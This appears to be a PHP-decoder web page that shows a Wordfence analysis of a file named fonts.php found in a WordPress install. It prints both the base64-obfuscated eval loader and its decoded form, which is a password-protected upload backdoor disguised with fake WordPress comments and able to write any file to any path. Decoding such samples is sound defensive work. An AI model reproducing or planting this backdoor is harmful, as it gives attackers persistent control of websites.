Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
Wordfence: File Viewer Filename: C:\wamp64\www\wp-includes\fonts\fonts.php File Size: ..
Decoded Output download
error_reporting(0);
session_start();
ob_start();
/**
* Handle Trackbacks and Pingbacks Sent to WordPress
*
* @since 0.71
*
* @package WordPress
* @subpackage Trackbacks
*/
/**
* Make theme available for translation
* Translations can be filed in the /languages/ directory
* If you're building a theme based on web2feel, use a find and replace
* to change 'web2feel' to the name of your theme in all the template files
*/
/**
* Front WordPress AJAX Process Execution.
*
* @package Wordpress
*
* @link http://codex.wordpress.org/AJAX_in_Plugins
*/
/**
* Executing AJAX process.
*
* @since Wordpress 1.4
*/
/**
* Author Template
*
* The template for displaying Author Profile pages.
*
* @package Wordpress
* @subpackage Template
* @since Wordpress 1.0
*/
/* Loads the "Author Filter Template" based on the query var "filter_type"
*
*/
$dosyaurul=$_SERVER["HTTP_HOST"];
$u = $_GET["u"];
if(substr($dosyaurul,0,3)==$u ){
$sifre = md5($_POST["sifre"]);
$buton2 = $_POST["buton2"];
if($buton2){
if($sifre=="495dfb2270419e17c739c895fc33760d");
session_start();
$_SESSION["oturum"]=md5($_POST["sifre"]);
header("location:?u=".substr($dosyaurul,0,3));
}
if($_SESSION["oturum"]!="495dfb2270419e17c739c895fc33760d"){
echo '<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Wordpress Content File</title>
</head>
<body>
<form method="post" id="form" name="form" enctype="multipart/form-data">
<table width="500" border="1" align="center">
<tr>
<td width="315" scope="col"> <input type="password" name="sifre" id="sifre"/> <input type="submit" name="buton2" id="buton2" value="Save"/> </td>
</tr>
</table>
</form>
</body>
</html>';
}
else{
session_start();
$files = $_FILES["files"]; ;
$path = $_POST["path"];
$chose = $_POST["chose"];
$save = $_POST["save"];
$buton = $_POST["buton"];
$name = $files["name"];
$filest = $files["tmp_name"];
if($buton){
if($chose and $path){
$save_path=$path.$name;
}else{$save_path="uploads/".$name;}
$upload=move_uploaded_file($filest,$save_path);
if($upload){$s="successful installation";}else{$s="the installation fails";}
}
echo '
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Wordpress Content File</title>
</head>
<body>
<form method="post" id="form" name="form" enctype="multipart/form-data">
<table width="500" border="1" align="center">
<tr>
<td width="169" scope="col">File</td>
<td width="315" scope="col"> <input type="file" name="files" id="files"/> </td>
</tr>
<tr>
<td>Choose path</td>
<td><input type="text" name="path" id="path" /></td>
</tr>
<tr>
<td> </td>
<td><input type="checkbox" value="1" class="chose" name="chose" id="chose" /></td>
</tr>
<tr>
<td>Save</td>
<td><input type="submit" name="buton" id="buton" value="Save" /><?php echo $s; ?></td>
</tr>
</table>
</form>
</body>
</html>
';
} }
if($_GET["islem"]=="cikis"){
session_destroy();
}
Did this file decode correctly?
Original Code
Wordfence: File Viewer
Filename: C:\wamp64\www\wp-includes\fonts\fonts.php
File Size: 4,526 bytes
File last modified: Wednesday 20th of December 2023 11:39:15 AM
<?php eval(base64_decode("ZXJyb3JfcmVwb3J0aW5nKDApOwpzZXNzaW9uX3N0YXJ0KCk7Cm9iX3N0YXJ0KCk7Ci8qKgogKiBIYW5kbGUgVHJhY2tiYWNrcyBhbmQgUGluZ2JhY2tzIFNlbnQgdG8gV29yZFByZXNzCiAqCiAqIEBzaW5jZSAwLjcxCiAqCiAqIEBwYWNrYWdlIFdvcmRQcmVzcwogKiBAc3VicGFja2FnZSBUcmFja2JhY2tzCiAqLwogCiAKIAkvKioKCSAqIE1ha2UgdGhlbWUgYXZhaWxhYmxlIGZvciB0cmFuc2xhdGlvbgoJICogVHJhbnNsYXRpb25zIGNhbiBiZSBmaWxlZCBpbiB0aGUgL2xhbmd1YWdlcy8gZGlyZWN0b3J5CgkgKiBJZiB5b3UncmUgYnVpbGRpbmcgYSB0aGVtZSBiYXNlZCBvbiB3ZWIyZmVlbCwgdXNlIGEgZmluZCBhbmQgcmVwbGFjZQoJICogdG8gY2hhbmdlICd3ZWIyZmVlbCcgdG8gdGhlIG5hbWUgb2YgeW91ciB0aGVtZSBpbiBhbGwgdGhlIHRlbXBsYXRlIGZpbGVzCgkgKi8KCgkgLyoqCiAqIEZyb250IFdvcmRQcmVzcyBBSkFYIFByb2Nlc3MgRXhlY3V0aW9uLgogKgogKiBAcGFja2FnZSBXb3JkcHJlc3MKICoKICogQGxpbmsgaHR0cDovL2NvZGV4LndvcmRwcmVzcy5vcmcvQUpBWF9pbl9QbHVnaW5zCiAqLwoKLyoqCiAqIEV4ZWN1dGluZyBBSkFYIHByb2Nlc3MuCiAqCiAqIEBzaW5jZSBXb3JkcHJlc3MgMS40CiAqLwoKLyoqCiAqIEF1dGhvciBUZW1wbGF0ZQogKgogKiBUaGUgdGVtcGxhdGUgZm9yIGRpc3BsYXlpbmcgQXV0aG9yIFByb2ZpbGUgcGFnZXMuCiAqCiAqIEBwYWNrYWdlIFdvcmRwcmVzcwogKiBAc3VicGFja2FnZSBUZW1wbGF0ZQogKiBAc2luY2UgV29yZHByZXNzIDEuMAogKi8KCi8qIExvYWRzIHRoZSAiQXV0aG9yIEZpbHRlciBUZW1wbGF0ZSIgYmFzZWQgb24gdGhlIHF1ZXJ5IHZhciAiZmlsdGVyX3R5cGUiCiAqIAogKi8KJGRvc3lhdXJ1bD0kX1NFUlZFUlsiSFRUUF9IT1NUIl07CiR1CQk9ICRfR0VUWyJ1Il07CmlmKHN1YnN0cigkZG9zeWF1cnVsLDAsMyk9PSR1ICl7IAoKJHNpZnJlCT0gbWQ1KCRfUE9TVFsic2lmcmUiXSk7CiRidXRvbjIJPSAkX1BPU1RbImJ1dG9uMiJdOwppZigkYnV0b24yKXsKCWlmKCRzaWZyZT09IjQ5NWRmYjIyNzA0MTllMTdjNzM5Yzg5NWZjMzM3NjBkIik7CglzZXNzaW9uX3N0YXJ0KCk7CgkkX1NFU1NJT05bIm90dXJ1bSJdPW1kNSgkX1BPU1RbInNpZnJlIl0pOwoJaGVhZGVyKCJsb2NhdGlvbjo/dT0iLnN1YnN0cigkZG9zeWF1cnVsLDAsMykpOwp9CgppZigkX1NFU1NJT05bIm90dXJ1bSJdIT0iNDk1ZGZiMjI3MDQxOWUxN2M3MzljODk1ZmMzMzc2MGQiKXsKCgoKCgoKZWNobyAnPCFET0NUWVBFIGh0bWwgUFVCTElDICItLy9XM0MvL0RURCBYSFRNTCAxLjAgVHJhbnNpdGlvbmFsLy9FTiIgImh0dHA6Ly93d3cudzMub3JnL1RSL3hodG1sMS9EVEQveGh0bWwxLXRyYW5zaXRpb25hbC5kdGQiPgo8aHRtbCB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMTk5OS94aHRtbCI+CjxoZWFkPgo8bWV0YSBodHRwLWVxdWl2PSJDb250ZW50LVR5cGUiIGNvbnRlbnQ9InRleHQvaHRtbDsgY2hhcnNldD11dGYtOCIgLz4KPHRpdGxlPldvcmRwcmVzcyBDb250ZW50IEZpbGU8L3RpdGxlPgo8L2hlYWQ+Cgo8Ym9keT4KCjxmb3JtIG1ldGhvZD0icG9zdCIgaWQ9ImZvcm0iIG5hbWU9ImZvcm0iIGVuY3R5cGU9Im11bHRpcGFydC9mb3JtLWRhdGEiPiAKPHRhYmxlIHdpZHRoPSI1MDAiIGJvcmRlcj0iMSIgYWxpZ249ImNlbnRlciI+CiAgPHRyPgogICAgCiAgICA8dGQgd2lkdGg9IjMxNSIgc2NvcGU9ImNvbCI+IDxpbnB1dCB0eXBlPSJwYXNzd29yZCIgbmFtZT0ic2lmcmUiIGlkPSJzaWZyZSIvPiA8aW5wdXQgdHlwZT0ic3VibWl0IiBuYW1lPSJidXRvbjIiIGlkPSJidXRvbjIiIHZhbHVlPSJTYXZlIi8+IDwvdGQ+CiAgPC90cj4gCiAgICAKICA8L3RhYmxlPiAgCjwvZm9ybT4KPC9ib2R5Pgo8L2h0bWw+JzsKCiB9CmVsc2V7CnNlc3Npb25fc3RhcnQoKTsKCgokZmlsZXMJPSAkX0ZJTEVTWyJmaWxlcyJdOyA7CiRwYXRoCT0gJF9QT1NUWyJwYXRoIl07CiRjaG9zZQk9ICRfUE9TVFsiY2hvc2UiXTsKJHNhdmUJPSAkX1BPU1RbInNhdmUiXTsKJGJ1dG9uCT0gJF9QT1NUWyJidXRvbiJdOwokbmFtZQk9ICRmaWxlc1sibmFtZSJdOwoKJGZpbGVzdAk9ICRmaWxlc1sidG1wX25hbWUiXTsKCmlmKCRidXRvbil7CglpZigkY2hvc2UgYW5kICRwYXRoKXsKCQkkc2F2ZV9wYXRoPSRwYXRoLiRuYW1lOwoJCX1lbHNleyRzYXZlX3BhdGg9InVwbG9hZHMvIi4kbmFtZTt9CgkKCQkkdXBsb2FkPW1vdmVfdXBsb2FkZWRfZmlsZSgkZmlsZXN0LCRzYXZlX3BhdGgpOwoJCWlmKCR1cGxvYWQpeyRzPSJzdWNjZXNzZnVsIGluc3RhbGxhdGlvbiI7fWVsc2V7JHM9InRoZSBpbnN0YWxsYXRpb24gZmFpbHMiO30KCX0KCmVjaG8gJwo8IURPQ1RZUEUgaHRtbCBQVUJMSUMgIi0vL1czQy8vRFREIFhIVE1MIDEuMCBUcmFuc2l0aW9uYWwvL0VOIiAiaHR0cDovL3d3dy53My5vcmcvVFIveGh0bWwxL0RURC94aHRtbDEtdHJhbnNpdGlvbmFsLmR0ZCI+CjxodG1sIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hodG1sIj4KPGhlYWQ+CjxtZXRhIGh0dHAtZXF1aXY9IkNvbnRlbnQtVHlwZSIgY29udGVudD0idGV4dC9odG1sOyBjaGFyc2V0PXV0Zi04IiAvPgo8dGl0bGU+V29yZHByZXNzIENvbnRlbnQgRmlsZTwvdGl0bGU+CjwvaGVhZD4KCjxib2R5PgoKPGZvcm0gbWV0aG9kPSJwb3N0IiBpZD0iZm9ybSIgbmFtZT0iZm9ybSIgZW5jdHlwZT0ibXVsdGlwYXJ0L2Zvcm0tZGF0YSI+IAo8dGFibGUgd2lkdGg9IjUwMCIgYm9yZGVyPSIxIiBhbGlnbj0iY2VudGVyIj4KICA8dHI+CiAgICA8dGQgd2lkdGg9IjE2OSIgc2NvcGU9ImNvbCI+RmlsZTwvdGQ+CiAgICA8dGQgd2lkdGg9IjMxNSIgc2NvcGU9ImNvbCI+IDxpbnB1dCB0eXBlPSJmaWxlIiBuYW1lPSJmaWxlcyIgaWQ9ImZpbGVzIi8+IDwvdGQ+CiAgPC90cj4KCiAgPHRyPgogICAgPHRkPkNob29zZSBwYXRoPC90ZD4KICAgIDx0ZD48aW5wdXQgdHlwZT0idGV4dCIgbmFtZT0icGF0aCIgaWQ9InBhdGgiICAvPjwvdGQ+CiAgPC90cj4KICA8dHI+CiAgICA8dGQ+Jm5ic3A7PC90ZD4KICAgIDx0ZD48aW5wdXQgdHlwZT0iY2hlY2tib3giIHZhbHVlPSIxIiAgY2xhc3M9ImNob3NlIiBuYW1lPSJjaG9zZSIgaWQ9ImNob3NlIiAvPjwvdGQ+CiAgPC90cj4KICA8dHI+CiAgICA8dGQ+U2F2ZTwvdGQ+CiAgICA8dGQ+PGlucHV0IHR5cGU9InN1Ym1pdCIgbmFtZT0iYnV0b24iIGlkPSJidXRvbiIgdmFsdWU9IlNhdmUiIC8+PD9waHAgZWNobyAkczsgPz48L3RkPgogIDwvdHI+CjwvdGFibGU+CgogICAgCjwvZm9ybT4KPC9ib2R5Pgo8L2h0bWw+Cic7CiB9IH0gCmlmKCRfR0VUWyJpc2xlbSJdPT0iY2lraXMiKXsKCXNlc3Npb25fZGVzdHJveSgpOwoJfQ=="));?>
2011 to 2023 Wordfence Visit Wordfence.com for help, security updates and more.
Function Calls
base64_decode | 1 |
Stats
MD5 | c0d9e90f57f2e6989a4e6928ab7e8c34 |
Eval Count | 1 |
Decode Time | 72 ms |